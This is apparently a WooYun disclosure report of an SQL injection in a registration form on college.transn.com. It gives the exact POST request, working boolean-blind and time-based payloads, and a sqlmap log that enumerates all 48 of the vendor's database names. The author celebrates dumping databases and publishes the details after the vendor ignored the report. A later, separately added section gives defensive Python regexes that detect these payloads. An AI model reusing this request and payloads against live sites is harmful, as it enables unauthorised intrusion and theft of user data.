Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-0111011

Title: SQL injection at a transn (传神) endpoint leaks data network-wide, 48 databases

Vendor: transn.com

Author: 路人甲

Submitted: 2015-04-29 10:42

Fix time: 2015-05-04 10:44

Disclosed: 2015-05-04 10:44

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-04-29: Details sent to the vendor, awaiting the vendor's handling
2015-05-04: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

What I dislike most are people who keep asking the vendor for gifts~ Damn! If they really won't give you anything, just keep submitting vulnerabilities!! Best of all, submit very high-risk ones during the holidays!!!~ The database dump ("pants") is pretty important too!

Detailed description:

POST /tools/fanyidasai/fanyidasai.php HTTP/1.1
Host: college.transn.com
Proxy-Connection: keep-alive
Content-Length: 116
Accept: text/plain, */*; q=0.01
Origin: http://college.transn.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://college.transn.com/tools/fanyidasai/regist.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
username=123&password=123&newpassword1=&newpassword2=&mode=0&name=&sex=m&college=&class=&number=&cardid=&tel=&email=


[Screenshot: QQ截图20150429102332.png]


[Screenshot: QQ截图20150429102341.png]


Proof of vulnerability:

[Screenshot: QQ截图20150429102355.png]


[root@Hacker~]# Sqlmap Sqlmap -r E:\1.txt --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey al
[*] starting at 10:11:18
[10:11:18] [INFO] parsing HTTP request from 'E:\1.txt'
[10:11:18] [INFO] testing connection to the target URL
[10:11:18] [INFO] testing if the target URL is stable. This can take a couple of seconds
[10:11:20] [INFO] target URL is stable
[10:11:20] [INFO] testing if POST parameter 'username' is dynamic
[10:11:20] [WARNING] POST parameter 'username' does not appear dynamic
[10:11:20] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
[10:11:20] [INFO] testing for SQL injection on POST parameter 'username'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
[10:11:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:11:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:11:26] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:11:28] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[10:11:29] [INFO] POST parameter 'username' is 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable
[10:11:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:11:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[10:11:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[10:11:29] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[10:11:29] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[10:11:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[10:11:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[10:11:30] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[10:11:30] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[10:11:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[10:11:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[10:11:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[10:11:30] [INFO] testing 'MySQL inline queries'
[10:11:30] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:11:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:11:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:11:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[10:11:30] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[10:11:50] [INFO] POST parameter 'username' is 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[10:11:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[10:11:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique fou
[10:11:50] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automaticall
[10:11:51] [INFO] target URL appears to have 37 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[10:12:10] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)
[10:12:10] [INFO] testing 'MySQL UNION query (14) - 22 to 40 columns'
[10:12:12] [INFO] target URL appears to be UNION injectable with 37 columns
[10:12:18] [INFO] testing 'MySQL UNION query (14) - 42 to 60 columns'
[10:12:20] [INFO] testing 'MySQL UNION query (14) - 62 to 80 columns'
[10:12:21] [INFO] testing 'MySQL UNION query (14) - 82 to 100 columns'
[10:12:23] [INFO] testing 'Generic UNION query (14) - 1 to 20 columns'
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 446 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: username=123' RLIKE IF(9850=9850,123,0x28) AND 'dDUu'='dDUu&password=123&newpassword1=&newpassword2=&mode=0&name=&sex=m&college=&class
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: username=123' AND 4617=BENCHMARK(5000000,MD5(0x75645772)) AND 'kvZl'='kvZl&password=123&newpassword1=&newpassword2=&mode=0&name=&sex=m
---
[10:12:34] [INFO] testing MySQL
[10:12:34] [INFO] confirming MySQL
[10:12:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[10:12:34] [INFO] fetching database names
[10:12:34] [INFO] fetching number of databases
[10:12:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:12:34] [INFO] retrieved: 48
[10:12:35] [INFO] retrieved: information_schema
[10:12:49] [INFO] retrieved: TCATPDB
[10:12:55] [INFO] retrieved: bk_release_wattapi
[10:13:09] [INFO] retrieved: ctat
[10:13:12] [INFO] retrieved: edu_web
[10:13:18] [INFO] retrieved: entwcat
[10:13:24] [INFO] retrieved: icatweb
[10:13:30] [INFO] retrieved: miniwcat
[10:13:36] [INFO] retrieved: miniwtm_miniwcat
[10:13:49] [INFO] retrieved: mysql
[10:13:53] [INFO] retrieved: nankaictat
[10:14:01] [INFO] retrieved: nankaitraining
[10:14:12] [INFO] retrieved: nankaitraining_wtm
[10:14:26] [INFO] retrieved: new_training
[10:14:36] [INFO] retrieved: new_training_wtm
[10:14:49] [INFO] retrieved: release_translib
[10:15:01] [INFO] retrieved: release_wattapi_new
[10:15:19] [INFO] retrieved: school
[10:15:24] [INFO] retrieved: school_bfsu
[10:15:33] [INFO] retrieved: school_bfsu_wtm
[10:15:45] [INFO] retrieved: school_wtm
[10:15:56] [INFO] retrieved: tcat_ent
[10:16:03] [INFO] retrieved: tcat_ent_test
[10:16:13] [INFO] retrieved: tcatwebsite
[10:16:22] [INFO] retrieved: test
[10:16:26] [INFO] retrieved: test0801_wattapi
[10:16:38] [INFO] retrieved: test_entwcat
[10:16:48] [INFO] retrieved: test_translib
[10:16:58] [INFO] retrieved: test_wattapi
[10:17:08] [INFO] retrieved: testctat
[10:17:14] [INFO] retrieved: testedu_web
[10:17:44] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[10:17:45] [INFO] retrieved: testminiwcat
[10:17:55] [INFO] retrieved: testminiwtm_miniwcat
[10:18:10] [INFO] retrieved: testschool
[10:18:18] [INFO] retrieved: testschool_wtm
[10:18:30] [INFO] retrieved: testtportal
[10:18:39] [INFO] retrieved: testwtm
[10:18:45] [INFO] retrieved: testwtm_miniwcat
[10:18:57] [INFO] retrieved: tportal
[10:19:03] [INFO] retrieved: training
[10:19:10] [INFO] retrieved: training_ctat
[10:19:20] [INFO] retrieved: training_wtm
[10:19:30] [INFO] retrieved: transndict
[10:19:38] [INFO] retrieved: transndict_logs
[10:19:52] [INFO] retrieved: v_translib
[10:20:00] [INFO] retrieved: v_wattapi
[10:20:08] [INFO] retrieved: wtm
[10:20:11] [INFO] retrieved: wtm_miniwcat
available databases [48]:
[*] bk_release_wattapi
[*] ctat
[*] edu_web
[*] entwcat
[*] icatweb
[*] information_schema
[*] miniwcat
[*] miniwtm_miniwcat
[*] mysql
[*] nankaictat
[*] nankaitraining
[*] nankaitraining_wtm
[*] new_training
[*] new_training_wtm
[*] release_translib
[*] release_wattapi_new
[*] school
[*] school_bfsu
[*] school_bfsu_wtm
[*] school_wtm
[*] tcat_ent
[*] tcat_ent_test
[*] TCATPDB
[*] tcatwebsite
[*] test
[*] test0801_wattapi
[*] test_entwcat
[*] test_translib
[*] test_wattapi
[*] testctat
[*] testedu_web
[*] testminiwcat
[*] testminiwtm_miniwcat
[*] testschool
[*] testschool_wtm
[*] testtportal
[*] testwtm
[*] testwtm_miniwcat
[*] tportal
[*] training
[*] training_ctat
[*] training_wtm
[*] transndict
[*] transndict_logs
[*] v_translib
[*] v_wattapi
[*] wtm
[*] wtm_miniwcat
[10:20:24] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled
[10:20:24] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\college.transn.com'
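Detection logic, added here as an example and not part of the original report, that flags form fields carrying the injection shapes sqlmap found on this endpoint (a quote closing the string literal followed by RLIKE/AND, and the BENCHMARK() heavy query). The sample request bodies are constructed from the report's own request and payloads, with trailing fields shortened and one percent-encoded variant added by me.

```python
import re
from urllib.parse import parse_qs

# Injection shapes seen in the report's sqlmap output: a quote that closes
# the string literal followed by RLIKE/AND/OR (boolean-based blind), and the
# BENCHMARK() heavy-query construct (time-based blind). SLEEP() and
# UNION ... SELECT are the obvious siblings and are included for generality.
SQLI_PATTERNS = {
    "quote-break": re.compile(r"'\s*(?:AND|OR|RLIKE)\b", re.I),
    "benchmark": re.compile(r"\bBENCHMARK\s*\(", re.I),
    "sleep": re.compile(r"\bSLEEP\s*\(", re.I),
    "union-select": re.compile(r"\bUNION\b.+\bSELECT\b", re.I | re.S),
}


def find_sqli_params(body: str) -> dict:
    """Map each suspicious form field to the pattern names it matched.

    parse_qs percent-decodes and splits the body first, so an encoded
    payload is inspected in the same form the PHP script would see it.
    """
    hits = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            matched = [k for k, p in SQLI_PATTERNS.items() if p.search(value)]
            if matched:
                hits.setdefault(name, []).extend(matched)
    return hits


# Constructed sample bodies: the report's benign registration request, the
# two sqlmap payloads from the report (trailing fields shortened), and a
# percent-encoded variant as the payload travels on the wire.
BENIGN = ("username=123&password=123&newpassword1=&newpassword2=&mode=0"
          "&name=&sex=m&college=&class=&number=&cardid=&tel=&email=")
BOOLEAN_BLIND = ("username=123' RLIKE IF(9850=9850,123,0x28) AND 'dDUu'='dDUu"
                 "&password=123&mode=0")
TIME_BLIND = ("username=123' AND 4617=BENCHMARK(5000000,MD5(0x75645772))"
              " AND 'kvZl'='kvZl&password=123&mode=0")
ENCODED = ("username=123%27%20RLIKE%20IF%289850%3D9850%2C123%2C0x28%29"
           "%20AND%20%27dDUu%27%3D%27dDUu&password=123&mode=0")

if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("boolean", BOOLEAN_BLIND),
                        ("time", TIME_BLIND), ("encoded", ENCODED)]:
        print(label, find_sqli_params(body))
```

Only the `username` field is flagged in the three malicious bodies; the benign registration request from the report produces no hits.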

Remediation:

Dear vendor, I've been asking for your contact details for so long that I'm speechless!

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: No impact (vendor ignored)

Ignored at: 2015-05-04 10:44

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None